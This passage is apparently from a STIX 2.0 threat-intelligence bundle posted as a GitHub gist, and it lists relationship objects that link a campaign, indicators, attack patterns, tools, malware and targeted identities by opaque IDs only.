"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-3c47a332-3340-4aec-8893-91de45a8db73",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--713e98b9-8224-5dd8-985a-b11c5a5dbf5a",
"created": "2019-02-23T16:30:28.980Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-95499e70-0eaf-4182-9098-e1676e414121",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f"
},
{
"id": "relationship--3019f876-2765-57f8-ac76-9d6a7e192b63",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.126Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--68e67ff9-fc05-5ec6-bd4c-e5caba9fc348",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.126Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "tool--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--c7c55199-db19-58a8-940a-62f7747e2f39",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "malware--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--e4acc0cb-83c3-52de-b2b0-8f219e8ac594",
"created": "2018-12-31T16:12:37.620Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-a546c5e1-4666-4241-984e-d17f13c1c0a4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--11f678b0-5714-5b22-b38f-6f564ab11570",
"created": "2018-12-31T16:12:37.655Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-58ab772a-a9b3-4c7d-8a75-1ac2afe132cf",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0"
},
{
"id": "relationship--b121c4f7-f936-5168-ae95-09a079342d2b",
"created": "2018-12-31T16:12:38.687Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-4b6a2f5c-c2b5-4410-8240-8158b804174c",
"type": "relationship",
"modified": "2019-03-06T12:13:36.127Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--1ec7af9c-ed09-5cab-aeff-36c9af162f35",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "attack-pattern--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--2db60a8b-fc78-51ea-8f58-16ac63889b6e",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "tool--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--93afc15d-f326-5892-a587-69738379f817",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.128Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "uses",
"target_ref": "malware--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--fa57e410-7ce8-5bfe-8bed-cf3573cb3d24",
"created": "2018-12-31T16:12:38.767Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-362344a8-453e-4d83-a9ce-bcb4e7e35389",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "targets",
"target_ref": "identity--09e6a49a-3402-5d01-9daf-9b98a7b0d603"
},
{
"id": "relationship--54603bc5-251a-5fb2-9e76-0b9f36808763",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "attack-pattern--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--ec2ed279-9c43-5d57-89cb-f7f36fbc4222",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.129Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "tool--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--8a97e1f5-90f6-5752-bda2-0383f05c6c6c",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "indicates",
"target_ref": "malware--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--18369035-0528-5916-a5d3-16785cb30f7f",
"created": "2018-12-31T15:38:42.429Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2ba191f7-b957-44c0-a8d1-1a67e5699d0f",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"relationship_type": "x-indicated_ttps",
"target_ref": "identity--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--1da10acb-6917-58ad-acb9-d3c6ef6faec6",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.130Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "attack-pattern--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--75f9c241-80ce-5136-879a-f488ec181d80",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "tool--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--89fcf0a4-b40c-5b99-8ec6-a3a545ff9776",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "malware--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--b530b513-a18e-539c-a2ef-cbb145127227",
"created": "2019-02-23T16:30:29.714Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-6ee92ce6-cb2f-493e-ae9c-c6f5281ec511",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "derived-from",
"target_ref": "identity--c99598ea-40a1-504e-8ab5-4e8382fab701"
},
{
"id": "relationship--ff005842-0621-5616-9ff5-da2a16a860cc",
"created": "2018-12-31T16:12:41.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1e41a69a-5a2b-45b8-aa00-f93bfc7c178a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.131Z",
"source_ref": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"relationship_type": "derived-from",
"target_ref": "campaign--c2b46299-eb18-580a-a74f-bd68a12ae12d"
},
{
"id": "relationship--1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"created": "2019-02-23T16:30:28.977436+00:00",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\//ns}relation-f1f1dd06-bcb6-4b22-b12a-fce16a10e4dd",
"type": "relationship",
"modified": "2019-02-23T16:30:28.977436+00:00",
"source_ref": "attack-pattern--70108184-2109-4463-a68d-41cd48ab65ad",
"relationship_type": "derived-from",
"target_ref": "malware--1f1dd06-bcb6-4b22-b12a-fce16a10e4dd"
},
{
"id": "relationship--3c98de21-4fa9-4224-ba5d-619964829e7b",
"created": "2018-12-31T15:21:48.986351+00:00",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\//ns}relation-349762e7-0223-464d-b3dc-4b561e2bd789",
"type": "relationship",
"modified": "2018-12-31T15:21:48.986351+00:00",
"source_ref": "malware--f1f1dd06-bcb6-4b22-b12a-fce16a10e4dd",
"relationship_type": "derived-from",
"target_ref": "malware--349762e7-0223-464d-b3dc-4b561e2bd789"
}
],
"type": "bundle",
"id": "bundle--0932a712-2faf-4eb5-bd4e-88a6cacfb97b",
"spec_version": "2.0"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment